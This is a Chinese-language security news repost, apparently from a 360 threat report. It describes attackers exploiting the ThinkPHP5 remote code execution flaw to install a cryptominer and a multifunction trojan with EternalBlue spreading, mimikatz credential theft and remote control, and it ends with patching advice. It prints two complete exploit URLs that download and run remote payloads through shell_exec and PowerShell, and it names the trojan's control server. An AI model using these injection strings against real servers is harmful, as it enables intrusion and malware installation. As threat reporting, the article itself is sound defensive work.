安基网 首页 资讯 安全报 查看内容

ThinkPHP5 getshell漏洞被利用执行永恒之蓝攻击木马

2018-12-29 00:35| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: ThinkPHP是一款基于PHP的Web应用程序开发框架,它开源并且有着广泛的流行度,据统计,目前有超过50万台服务器正运行ThinkPHP(数据来源于Think PHP官网)。近期ThinkPHP发布了一个安全更新,用于修复未经身份验证的 ...

ThinkPHP是一款基于PHP的Web应用程序开发框架,它开源并且有着广泛的流行度,据统计,目前有超过50万台服务器正运行ThinkPHP(数据来源于Think PHP官网)。

近期ThinkPHP发布了一个安全更新,用于修复未经身份验证的高风险远程代码执行(RCE)漏洞,360Cert也曾针对该漏洞发布过预警(https://cert.360.cn/warning/detail?id=09c85b4e91623c92fc4e21d6cd9b1332)。而最近,我们则监测到利用这个已被披露的ThinkPHP RCE漏洞发起攻击的案例:黑客利用此漏洞在运行有未打补丁的ThinkPHP的服务器上(包含Windows、Linux)安装远控、挖矿、永恒之蓝攻击模块等。

攻击流程示意图

其一,利用ThinkPHP RCE漏洞进行挖矿:

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh

下载挖矿木马的shell脚本

其二,利用ThinkPHP RCE漏洞执行多功能综合木马:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(hxxp://a46.bulehero.in/download.exe,C:/12.exe);start C:/12.exe

被下载到本地的Download.exe为集远控、挖矿、永恒之蓝攻击等多合一的木马:

其中,挖矿模块参数如下:

挖矿模块参数

从钱包地址查看,已经有146个门罗币的进帐:

钱包地址相关信息

Download.exe中的永恒之蓝攻击模块:

永恒之蓝攻击模块

木马会获取本地IP段,并随机生成部分IP段进行永恒之蓝攻击尝试:

基于永恒之蓝模块发起的攻击

此外,木马还会调用mimikatz获取windows账号的密码:

调用mimkatz获取windows系统账号

最后,木马还带有远控模块,其上线地址为:a45[.]bulehero[.]in

远控功能模块

远控连接

360互联网安全中心提醒广大站长:

1. 将ThinkPHP升级到5.0.23或5.1.31以上的版本,以解决此问题。

2. 如果您正在使用基于ThinkPHP5的CMS(网站内容管理系统),也可能会受此漏洞影响,同样建议对其进行升级。

3. 服务器及时安装系统漏洞补丁并使用安全软件进行防护。

附:ThinkPHP相关说明的官网链接:https://blog.thinkphp.cn/869075

ThinkPHP5安全更新说明


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6640048859860959751/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部